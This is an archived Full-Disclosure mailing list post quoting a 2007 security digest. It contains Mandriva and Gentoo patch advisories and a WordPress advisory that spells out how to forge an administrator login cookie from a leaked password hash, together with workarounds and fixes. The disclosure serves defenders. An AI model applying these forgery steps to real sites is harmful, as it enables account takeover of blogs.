|
Full Disclosure
mailing list archives
unsubscribe
From: "LT" <lt () mac hush com>
Date: Mon, 26 Nov 2007 18:54:01 +0100
On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-
request () lists grok org uk wrote:
Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk
You can reach the person managing the list at
full-disclosure-owner () lists grok org uk
When replying, please edit your Subject line so it is more
specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please
trim your post appropriately. Thank you.
Today's Topics:
1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote
denial of service vulnerability (security () mandriva com)
2. Wordpress Cookie Authentication Vulnerability (Steven J.
Murdoch)
3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple
vulnerabilities and bugs (security () mandriva com)
5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear
php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar
Broad)
8. [ MDKSA-2007:227 ] - Updated poppler packages fix
vulnerabilities (security () mandriva com)
9. [ MDKSA-2007:228 ] - Updated cups packages fix
vulnerabilities (security () mandriva com)
10. Tha Manual. (rchrafe)
11. The Call to Reason (rchrafe)
12. Re: How to become a Computer Security Professional ?
(rchrafe)
13. Re: How to become a Computer Security Professional ?
(rchrafe)
14. Re: How to become a Computer Security Professional ?
(rchrafe)
15. Large Scale MySpace Phishing Attack (Dancho Danchev)
16. Re: Multiple stack-based buffer overflows in dxmsft.dll
(Elazar Broad)
17. Re: so gay huh? (rchrafe)
18. Re: so gay huh? (rchrafe)
-------------------------------------------------------------------
---
Message: 1
Date: Mon, 19 Nov 2007 11:12:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp
packages fix remote denial of service vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1IuB6c-0001Xp-Fv () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
__________________________________________________________________
_____
Mandriva Linux Security Advisory MDKSA-
2007:225
http://www.mandriva.com/security/
__________________________________________________________________
_____
Package : net-snmp
Date : November 19, 2007
Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
Multi Network Firewall 2.0
__________________________________________________________________
_____
Problem Description:
The SNMP agent in net-snmp 5.4.1 and earlier allows remote
attackers to
cause a denial of service (CPU and memory consumption) via a
GETBULK
request with a large max-repeaters value.
Updated packages fix this issue.
__________________________________________________________________
_____
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
__________________________________________________________________
_____
Updated Packages:
Mandriva Linux 2007.0:
83e0d0edc66af5d11b032cf2a7c12054 2007.0/i586/libnet-snmp10-5.3.1-
2.1mdv2007.0.i586.rpm
211db38ffbbefb22f653a18da8e928f5 2007.0/i586/libnet-snmp10-devel-
5.3.1-2.1mdv2007.0.i586.rpm
b43cc33ca2b0fb582e69bbe52578e76a 2007.0/i586/libnet-snmp10-
static-devel-5.3.1-2.1mdv2007.0.i586.rpm
e2ac837cd1eff29bb56f5fa964f59ed5 2007.0/i586/net-snmp-5.3.1-
2.1mdv2007.0.i586.rpm
2434602e5d0a3133318600b4071cf4ea 2007.0/i586/net-snmp-mibs-5.3.1-
2.1mdv2007.0.i586.rpm
d9336d2710c1a44531cdb790cd8f47cf 2007.0/i586/net-snmp-trapd-
5.3.1-2.1mdv2007.0.i586.rpm
a1945889589568b420181a8a196d51ad 2007.0/i586/net-snmp-utils-
5.3.1-2.1mdv2007.0.i586.rpm
cf8fd2357e80a805ab3210fd3a8f8d01 2007.0/i586/perl-NetSNMP-5.3.1-
2.1mdv2007.0.i586.rpm
da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1-
2.1mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64:
7a4a25157d9a1e3b9cf4bf7af1205aa8 2007.0/x86_64/lib64net-snmp10-
5.3.1-2.1mdv2007.0.x86_64.rpm
cab6a3e8bc7167656e38e5a429eb8c0a 2007.0/x86_64/lib64net-snmp10-
devel-5.3.1-2.1mdv2007.0.x86_64.rpm
03f09f4fe99c381bda2603861f9644a2 2007.0/x86_64/lib64net-snmp10-
static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
425489fcb707757a46e0c6105309e2ff 2007.0/x86_64/net-snmp-5.3.1-
2.1mdv2007.0.x86_64.rpm
7df1fa9a564c63687621355561ba9eec 2007.0/x86_64/net-snmp-mibs-
5.3.1-2.1mdv2007.0.x86_64.rpm
fe2aaae5507ae5122a7d30f9fd74eef5 2007.0/x86_64/net-snmp-trapd-
5.3.1-2.1mdv2007.0.x86_64.rpm
ee1ae1d56af4b511b3bb2b1a986aa60a 2007.0/x86_64/net-snmp-utils-
5.3.1-2.1mdv2007.0.x86_64.rpm
04393ea88742f3b05586a555d8ad81ec 2007.0/x86_64/perl-NetSNMP-
5.3.1-2.1mdv2007.0.x86_64.rpm
da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1-
2.1mdv2007.0.src.rpm
Mandriva Linux 2007.1:
fa0f200cd711f97684d9debfdeef3e15 2007.1/i586/libnet-snmp10-5.3.1-
3.1mdv2007.1.i586.rpm
68c25bedfd4370a5fc0aa5ff934a2b1b 2007.1/i586/libnet-snmp10-devel-
5.3.1-3.1mdv2007.1.i586.rpm
ecbd2c76a1ea3595594f10c66bea5772 2007.1/i586/libnet-snmp10-
static-devel-5.3.1-3.1mdv2007.1.i586.rpm
04c676ae1290bbfbd7083252ae5b10dd 2007.1/i586/net-snmp-5.3.1-
3.1mdv2007.1.i586.rpm
2a6c6befd5958c7c9c946d2189d2f128 2007.1/i586/net-snmp-mibs-5.3.1-
3.1mdv2007.1.i586.rpm
5cd1e27c1af30157ead213324c440527 2007.1/i586/net-snmp-trapd-
5.3.1-3.1mdv2007.1.i586.rpm
423682a7f455940da49272647925838e 2007.1/i586/net-snmp-utils-
5.3.1-3.1mdv2007.1.i586.rpm
1ca18897188b7a34d98b146d65746477 2007.1/i586/perl-NetSNMP-5.3.1-
3.1mdv2007.1.i586.rpm
f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1-
3.1mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
9cdea571a84945accd6d38527b1bedb5 2007.1/x86_64/lib64net-snmp10-
5.3.1-3.1mdv2007.1.x86_64.rpm
8352cb8ef1fac035ea009d696e1d5837 2007.1/x86_64/lib64net-snmp10-
devel-5.3.1-3.1mdv2007.1.x86_64.rpm
5e54dd10e2f97bd2ee23f0a715ef734e 2007.1/x86_64/lib64net-snmp10-
static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
3187463725a5b015d3f507ac4a723160 2007.1/x86_64/net-snmp-5.3.1-
3.1mdv2007.1.x86_64.rpm
638d8c0a5d4be46ee1b9c2640ed7a061 2007.1/x86_64/net-snmp-mibs-
5.3.1-3.1mdv2007.1.x86_64.rpm
c4f41ebf9bf64dfc5236bb935ee16c31 2007.1/x86_64/net-snmp-trapd-
5.3.1-3.1mdv2007.1.x86_64.rpm
734133a9a7a860f90b76c8bd72a0ddd0 2007.1/x86_64/net-snmp-utils-
5.3.1-3.1mdv2007.1.x86_64.rpm
b1f5da81f1c27888df5ba8f71279fb05 2007.1/x86_64/perl-NetSNMP-
5.3.1-3.1mdv2007.1.x86_64.rpm
f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1-
3.1mdv2007.1.src.rpm
Corporate 3.0:
748009feee8a9d4d904b7e77537ff791 corporate/3.0/i586/libnet-snmp5-
5.1-7.3.C30mdk.i586.rpm
8ca0b75c8ec8e0839ae37335b04629ab corporate/3.0/i586/libnet-snmp5-
devel-5.1-7.3.C30mdk.i586.rpm
a0c2d416faa87c016826b5f8616c3af3 corporate/3.0/i586/libnet-snmp5-
static-devel-5.1-7.3.C30mdk.i586.rpm
99659604d3f40d23179b2b3138178e41 corporate/3.0/i586/net-snmp-5.1-
7.3.C30mdk.i586.rpm
3f9e8c99d31dd0dd0d3e5364325370ac corporate/3.0/i586/net-snmp-
mibs-5.1-7.3.C30mdk.i586.rpm
6bf842fa5664b91062fc74fac450aa90 corporate/3.0/i586/net-snmp-
trapd-5.1-7.3.C30mdk.i586.rpm
ced36508ad4a349cf945d62823b556d5 corporate/3.0/i586/net-snmp-
utils-5.1-7.3.C30mdk.i586.rpm
d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp-
5.1-7.3.C30mdk.src.rpm
Corporate 3.0/X86_64:
d3f097f7389841deb188d7353c5fdf5c corporate/3.0/x86_64/lib64net-
snmp5-5.1-7.3.C30mdk.x86_64.rpm
b53aea1a27f1c5a1e5515abb31ac70b0 corporate/3.0/x86_64/lib64net-
snmp5-devel-5.1-7.3.C30mdk.x86_64.rpm
a910dfbb95c2dd8fe70ce1c62e743c03 corporate/3.0/x86_64/lib64net-
snmp5-static-devel-5.1-7.3.C30mdk.x86_64.rpm
bfe1ba7a83f9afcacd9273eb6ebbd538 corporate/3.0/x86_64/net-snmp-
5.1-7.3.C30mdk.x86_64.rpm
b6e7b70f0d7549f44850834b2542fb8f corporate/3.0/x86_64/net-snmp-
mibs-5.1-7.3.C30mdk.x86_64.rpm
a5ab3548c27e86789e41248ab53e4982 corporate/3.0/x86_64/net-snmp-
trapd-5.1-7.3.C30mdk.x86_64.rpm
3c57bfdfa6b4ac44adab12bda0131a2f corporate/3.0/x86_64/net-snmp-
utils-5.1-7.3.C30mdk.x86_64.rpm
d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp-
5.1-7.3.C30mdk.src.rpm
Corporate 4.0:
0fac46c024f1cb4a8be101e69a942233 corporate/4.0/i586/libnet-snmp5-
5.2.1.2-5.1.20060mlcs4.i586.rpm
857fcac472ce931834cccde0de2741e4 corporate/4.0/i586/libnet-snmp5-
devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
112cceb5d76947959c251ecb1b157a3e corporate/4.0/i586/libnet-snmp5-
static-devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
ecf0b6386447f6442375cb39c60479cd corporate/4.0/i586/net-snmp-
5.2.1.2-5.1.20060mlcs4.i586.rpm
72a4fa1c8af3cc00bfbb3d877d5c329a corporate/4.0/i586/net-snmp-
mibs-5.2.1.2-5.1.20060mlcs4.i586.rpm
ab9ceaa6d9df42f687fe0c6790a2d266 corporate/4.0/i586/net-snmp-
trapd-5.2.1.2-5.1.20060mlcs4.i586.rpm
c66e13b576028690583f0fa2318bee3f corporate/4.0/i586/net-snmp-
utils-5.2.1.2-5.1.20060mlcs4.i586.rpm
8aeab0a22ec99e5cde40593c883415aa corporate/4.0/i586/perl-NetSNMP-
5.2.1.2-5.1.20060mlcs4.i586.rpm
b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp-
5.2.1.2-5.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
3bb05138c10885baa4db145f2ae6c726 corporate/4.0/x86_64/lib64net-
snmp5-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
2ef53cc96353eefb27abf76bc83bd35f corporate/4.0/x86_64/lib64net-
snmp5-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
14ce1bda23212a415cbdcc43b46813c2 corporate/4.0/x86_64/lib64net-
snmp5-static-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
f6e393154ee66701b8fb5d848aeb3d7e corporate/4.0/x86_64/net-snmp-
5.2.1.2-5.1.20060mlcs4.x86_64.rpm
77fcaeda03c9bed289ba9a7a6cc1ca48 corporate/4.0/x86_64/net-snmp-
mibs-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
e40ea44f385c0c92961fb11fa4013c02 corporate/4.0/x86_64/net-snmp-
trapd-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
537f8597086053c4d5a56ebd7d35b9e3 corporate/4.0/x86_64/net-snmp-
utils-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
51b4c70346529ba7a88de89543d16040 corporate/4.0/x86_64/perl-
NetSNMP-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp-
5.2.1.2-5.1.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
9210aef172a538942f490c89afb4022b mnf/2.0/i586/libnet-snmp5-5.1-
7.3.M20mdk.i586.rpm
844c7d5cb0cec99e3cab16792cb7766e mnf/2.0/SRPMS/net-snmp-5.1-
7.3.M20mdk.src.rpm
__________________________________________________________________
_____
To upgrade automatically use MandrivaUpdate or urpmi. The
verification
of md5 checksums and GPG signatures is performed automatically
for you.
All packages are signed by Mandriva for security. You can obtain
the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
__________________________________________________________________
_____
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM
+tyjwf62Xh9rba65JnJ1RtU=
=zmEd
-----END PGP SIGNATURE-----
------------------------------
Message: 2
Date: Mon, 19 Nov 2007 18:46:37 +0000
From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch () cl cam ac uk>
Subject: [Full-disclosure] Wordpress Cookie Authentication
Vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <20071119184637.GJ1043 () tern cl cam ac uk>
Content-Type: text/plain; charset="us-ascii"
Wordpress Cookie Authentication Vulnerability
Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version:
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-
auth.txt
CVE ID: <pending>
Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>
Systems Affected:
Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-
19)
Overview:
With read-only access to the Wordpress database, it is possible
to
generate a valid login cookie for any account, without resorting
to a
brute force attack. This allows a limited SQL injection
vulnerability
to be escalated into administrator access.
This vulnerability is known to be actively exploited, hence the
expedited public release.
I. Description
For authentication, the Wordpress user database stores the MD5
hash
of login passwords. A client is permitted access if they can
present a
password whose hash matches the stored one.
$ mysql -u wordpress -p wordpress
Enter password: ********
mysql> SELECT ID, user_login, user_pass FROM wp_users;
+----+-------------+----------------------------------+
| ID | user_login | user_pass |
+----+-------------+----------------------------------+
| 1 | admin | 4cee2c84f6de6d89a4db4f2894d14e38 |
...
Of course, entering your password after each action that requires
authorization would be exceptionally tedious. So, after logging
in,
Wordpress presents the client with two cookies:
wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe
5de8f304a684
The cookie names contains the MD5 hash (6092...1a5f) of the blog
URL.
The value of wordpressuser_... is the login name, and the value
of
wordpresspass is the double-MD5 hash of the user password.
Wordpress will permit access to a given user account if the
wordpressuserpass_... cookie matches the hash of the specified
user's
wp_users.user_pass database entry.
In other words, the database contains MD5(password) and the
cookie
contains MD5(MD5(password)). It is thus trivial to convert a
database
entry into an authentication cookie.
At this point the vulnerability should be clear. If an attacker
can
gain read access to the wp_user table, for example due to a
publicly
visible backup or SQL injection vulnerability, a valid cookie can
be
generated for any account.
This applies even if the user's password is sufficiently complex
to
resist brute force and rainbow table attacks. While it should be
computationally infeasible to go backwards from MD5(password) to
password, the attacker needs only to go forwards.
The exploitation steps are therefore:
1) Find the hash of the blog URL: Either just look at the URL,
or
create an account to get a user cookie
2) Read the user_pass entry from wp_users table: Look for
backups, perform SQL injection, etc...
3) Set the following cookies:
wordpressuser_<MD5(url)>=admin
wordpresspass_<MD5(url)>=MD5(user_pass)
4) You have admin access to the blog
II. Impact
A remote attacker, with read access to the password database can
gain
administrator rights. This may be used in conjunction with an SQL
injection attack, or after locating a database backup.
An attacker who has alternatively compromised the database of one
Wordpress blog can also gain access to any other whose users have
the
same password on both.
III. Solution
No vendor patch is available.
No timeline for a vendor patch has been announced.
Workarounds:
- Protect the Wordpress database, and do not allow backups to be
released.
- Keep your Wordpress installation up to date. This should reduce
the
risk that your database will be compromised.
- Do not share passwords across different sites.
- If you suspect a database to be compromised, change all
passwords
to different ones. It is not adequate to change the passwords
to
the same ones, since Wordpress does not "salt" [1] the password
database.
- Remove write permissions on the Wordpress files for the system
account that the webserver runs as. This will disable the theme
editor, but make it more difficult to escalate Wordpress
administrator access into the capability to execute arbitrary
code
- Configure the webserver to not execute files in any directory
writable by the webserver system account (e.g. the upload
directory).
Potential fixes:
The problem occurs because it is easy to go from the password
hash
in the database to a cookie (i.e the application of MD5 is the
wrong
way around). The simplest fix is to store MD5(MD5(password)) in
the
database, and make the cookie MD5(password). This still makes it
infeasible to retrieve the password from a cookie, but means
that it
is also infeasible to generate a valid cookie from the database
entry.
However, there are other vulnerabilities in the Wordpress cookie
and
password handling, which should be resolved too:
- Passwords are unsalted [2], leaving them open to brute force,
rainbow
table and other attacks [3].
- It is impossible to revoke a cookie without changing the
user's
password.
- Cookies do not contain an expiry time, so are always valid
(until
the user's password changes)
- There ought to be an option to limit cookies to a particular
IP address or range.
References:
[1] http://en.wikipedia.org/wiki/Salt_(cryptography)
[2] http://trac.wordpress.org/ticket/2394
[3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-
password-cracker/
Timeline:
2007-10-29: security () wordpress org notified; no response
2007-11-02: security () wordpress org notified;
Confirmation of active exploitation requested by
Wordpress
2007-11-02: Confirmation sent; no response
2007-11-19: Advisory released to full-disclosure and BugTraq
--
w: http://www.cl.cam.ac.uk/users/sjm217/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-
disclosure/attachments/20071119/f87361fa/attachment-0001.bin
------------------------------
Message: 3
Date: Mon, 19 Nov 2007 22:10:42 +0100
From: Pierre-Yves Rofes <py () gentoo org>
Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer
overflow
To: gentoo-announce () gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4741FBD2.5040609 () gentoo org>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - -
Gentoo Linux Security Advisory GLSA
200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - -
Severity: Normal
Title: Perl: Buffer overflow
Date: November 19, 2007
Bugs: #198196
ID: 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - -
Synopsis
========
A buffer overflow in the Regular Expression engine in Perl
possibly
allows for the execution of arbitrary code.
Background
==========
Perl is a stable, cross-platform programming language created by
Larry
Wall.
Affected packages
=================
---------------------------------------------------------------
----
Package / Vulnerable /
Unaffected
---------------------------------------------------------------
----
1 dev-lang/perl < 5.8.8-r4 >=
5.8.8-r4
Description
===========
Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine
(regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters
in a
regular expression.
Impact
======
A remote attacker could either entice a user to compile a
specially
crafted regular expression or actively compile it in case the
script
accepts remote input of regular expressions, possibly leading to
the
execution of arbitrary code with the privileges of the user
running
Perl.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Perl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"
References
==========
[ 1 ] CVE-2007-5116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-
5116
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200711-28.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
RVShInUYsQgHfjeb1K1xnE4=
=wi9y
-----END PGP SIGNATURE-----
------------------------------
Message: 4
Date: Mon, 19 Nov 2007 16:41:14 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel
packages fix multiple vulnerabilities and bugs
To: full-disclosure () lists grok org uk
Message-ID: <E1IuGEs-0007rF-PH () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
__________________________________________________________________
_____
Mandriva Linux Security Advisory MDKSA-
2007:226
http://www.mandriva.com/security/
__________________________________________________________________
_____
Package : kernel
Date : November 19, 2007
Affected: 2008.0
__________________________________________________________________
_____
Problem Description:
Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:
The minix filesystem code allows local users to cause a denial of
service (hang) via a malformed minix file stream (CVE-2006-6058).
An integer underflow in the Linux kernel prior to 2.6.23 allows
remote
attackers to cause a denial of service (crash) via a crafted SKB
length
value in a runt IEEE 802.11 frame when the
IEEE80211_STYPE_QOS_DATA
flag is set (CVE-2007-4997).
To update your kernel, please follow the directions located at:
http://www.mandriva.com/en/security/kernelupdate
__________________________________________________________________
_____
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
__________________________________________________________________
_____
Updated Packages:
Mandriva Linux 2008.0:
bfb8abfb7532255d239ce8ef3b39966b 2008.0/i586/kernel-2.6.22.9-
2mdv-1-1mdv2008.0.i586.rpm
c68305809aa8704146ea1a59cd687ab1 2008.0/i586/kernel-desktop-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
89a439f86bd47820345287275fe25674 2008.0/i586/kernel-desktop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
a13eab853fc0b044456d90d98c8e9008 2008.0/i586/kernel-desktop-
devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
229f00634e286da1ab490678cf201dab 2008.0/i586/kernel-desktop-
latest-2.6.22.9-2mdv2008.0.i586.rpm
e77c3f728f0ba5bf8491e27ef389df8c 2008.0/i586/kernel-desktop586-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
82d8110dc838a1a25b2d4de0e94872e3 2008.0/i586/kernel-desktop586-
devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
0be66b6c155ff5888900f784bf21f555 2008.0/i586/kernel-desktop586-
devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
48976bcfb3ecd30b2c2a671e49f2d241 2008.0/i586/kernel-desktop586-
latest-2.6.22.9-2mdv2008.0.i586.rpm
372de082e77dec0e87d93f389bff76cf 2008.0/i586/kernel-doc-2.6.22.9-
2mdv2008.0.i586.rpm
8fb68460352343d0c14b3d2c5581375f 2008.0/i586/kernel-laptop-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
0c76031c7eb78ba7da93b83ebf531541 2008.0/i586/kernel-laptop-devel-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
059f66f5340e538dda3d748276313975 2008.0/i586/kernel-laptop-devel-
latest-2.6.22.9-2mdv2008.0.i586.rpm
4d6c700c736a476718c809fb3a470ed9 2008.0/i586/kernel-laptop-
latest-2.6.22.9-2mdv2008.0.i586.rpm
57e0382893adc64445913de674815ad5 2008.0/i586/kernel-server-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
f2ea96b6c7f83f8de0f27dc1c2ea9193 2008.0/i586/kernel-server-devel-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
4de3613951fda9c4c92fcb35fe743a04 2008.0/i586/kernel-server-devel-
latest-2.6.22.9-2mdv2008.0.i586.rpm
4cc8313e4fed4a1a966bc4f4d0819f71 2008.0/i586/kernel-server-
latest-2.6.22.9-2mdv2008.0.i586.rpm
a30a7a388cdcdf089c39f7a7c26e34f0 2008.0/i586/kernel-source-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
5b919908b67f94571a4851caf08e8ece 2008.0/i586/kernel-source-
latest-2.6.22.9-2mdv2008.0.i586.rpm
6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9-
2mdv2007.0.src.rpm
Mandriva Linux 2008.0/X86_64:
d30b2a76ab4e37f296f07380fa8d41a4 2008.0/x86_64/kernel-2.6.22.9-
2mdv-1-1mdv2008.0.x86_64.rpm
3cdbd2356b7400f831a8b759d13952ec 2008.0/x86_64/kernel-desktop-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
a60abdec0274a9f96be2fb1117eb2f4a 2008.0/x86_64/kernel-desktop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
272ac8a552c99a1b72303a92f474d46f 2008.0/x86_64/kernel-desktop-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
8c78406bc678b51a4c84526b0874703e 2008.0/x86_64/kernel-desktop-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
8447a07d292dd930bba13a6d06bf6570 2008.0/x86_64/kernel-doc-
2.6.22.9-2mdv2008.0.x86_64.rpm
546663f7f08a1ed4a0e561c06960872e 2008.0/x86_64/kernel-laptop-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
482b6130e1695693ebfd610aade49255 2008.0/x86_64/kernel-laptop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
280678d50696a95f56735ad91fcc92ef 2008.0/x86_64/kernel-laptop-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
f4fedb72b7d286f9b9dae772b8251a7a 2008.0/x86_64/kernel-laptop-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
c811160740d5c4e138430fb757803bcc 2008.0/x86_64/kernel-server-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
1078b15d6cb4a1c420e7212d4a7ca545 2008.0/x86_64/kernel-server-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
e127a24e39d458865ebc54e61a7db34b 2008.0/x86_64/kernel-server-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
347576ae981042a8277c2adcdb433cfc 2008.0/x86_64/kernel-server-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
464e4b918285dac78af1b2521ebac461 2008.0/x86_64/kernel-source-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
affd96915a01aa3927dda61bd1fad19d 2008.0/x86_64/kernel-source-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9-
2mdv2007.0.src.rpm
__________________________________________________________________
_____
To upgrade automatically use MandrivaUpdate or urpmi. The
verification
of md5 checksums and GPG signatures is performed automatically
for you.
All packages are signed by Mandriva for security. You can obtain
the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
__________________________________________________________________
_____
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj
6pOfo1qywkIBnd5cQnlOdtM=
=qX1m
-----END PGP SIGNATURE-----
------------------------------
Message: 5
Date: Mon, 19 Nov 2007 21:14:15 -0000
From: "Rodrigo Rubira Branco (BSDaemon)"
<rodrigo () kernelhacking com>
Subject: [Full-disclosure] H2HC Materials
To: full-disclosure () lists grok org uk
Message-ID: <20071119231415.E4DED8BEEB () mail fjaunet com br>
Content-Type: text/plain; charset="iso-8859-1";
For those who have interest in better know about H2HC conference,
the
presentation materials are now online at
http://www.h2hc.org.br/repositorio.php
cya,
Rodrigo (BSDaemon).
--
http://www.kernelhacking.com/rodrigo
Kernel Hacking: If i really know, i can hack
GPG KeyID: 1FCEDEA1
________________________________________________
Message sent using UebiMiau 2.7.2
------------------------------
Message: 6
Date: Mon, 19 Nov 2007 15:06:46 -0500
From: rPath Update Announcements <announce-noreply () rpath com>
Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-
mysql
php5-pear php5-pgsql php5-soap php5-xsl
